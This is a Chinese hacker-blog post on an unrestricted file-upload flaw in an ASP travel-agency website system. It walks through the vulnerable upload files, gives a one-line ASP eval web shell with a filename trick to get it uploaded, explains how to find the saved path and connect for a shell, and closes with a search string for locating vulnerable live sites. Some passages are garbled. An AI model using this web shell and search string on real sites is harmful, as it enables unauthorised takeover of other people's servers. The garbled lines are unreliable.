危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2289 浏览18982458

简单暴力拿shell

经常去网上看有人公布Web程序的漏洞没,个人感觉被公布的著名Web程序的漏洞最近少了很多,呵呵。前几天危险漫步在网上闲逛时发现了一个易英冠诚旅行社网站系统的程序被人公布了一个漏洞,虽然不是什么著名程序,但漏洞利用起来却简单暴力,在几秒之内就能拿到shell,所以介绍给大家。

易英冠诚旅行社网站系统是一个用ASP语-言写的旅行社类网站系统,在网上用它建站的网站还算比较多。

一.漏洞简单分析

二.出现漏洞的文件是网站的htmIEditor目录下的le.asp。

只检查了上传文件是否为空,如果不为空的话就直接提交给file_action.asp,file_action.asp的关键代码。

除了包含了一个upload_5xsoft.asp文件外,只要上传的文件的大小大于0就进行上传,最后来看upload_5xsoft.asp,打开upload_5xsoft.asp的源代码发现用的是化境HTTP上传程序Version 2.0,没有对上传文件的扩展名做任何限制。

从file.asp到upload_5xsoft.asp,没有对上传文件的扩展名有任何限制,导致我们可以上传任意扩展名的文件,包括ASP木马。

三.漏洞利用方法

做过了漏洞的简单分析,利用起来就简单了。为了不“打扰”网络上的真实网站,我下载了存在漏洞的易英冠诚旅行社网站系统的源代码,在虚拟机里的Windows 2003系统中用IIS把网站运行了起来。

漏洞利用起来非常简单,直接打开。

在这里可以直接上传ASP木马,这里我上传1个ASP-句话木马,代码为<%eval request(”x”)%>,文件名为asp.as;p,通过“测览”按钮选择要t传Ei<Jasp.asp,点“确定”按钮后提示“恭喜您!上传文件成功!”。

说明文件已经成功传上去了。点“确定”按钮后会接着弹出来一个对话框“您查看的网页正在试图关闭窗口,是否关闭此窗口?”,这里一定要选“否”。也就是不关闭当前页面,因为我们要通过查看当前页面的源文件获得文件上传后保存的路径和文件名,点“否”后右键-查看源文件,源文件。

通过源文件知道文件上传到了uploadfiles目录下,上传后的文件名为20110416-0000000001.asp,用lake2的eval最小马发送端连接成功获得shell。

易英冠诚旅行社网站系统的这个漏洞非常简单,利用起来也简单暴力,存在漏洞的网站不到几秒钟就可以拿到shell。通过搜索“way/show.asp?id=’等能找到可能存在这个漏洞的网站。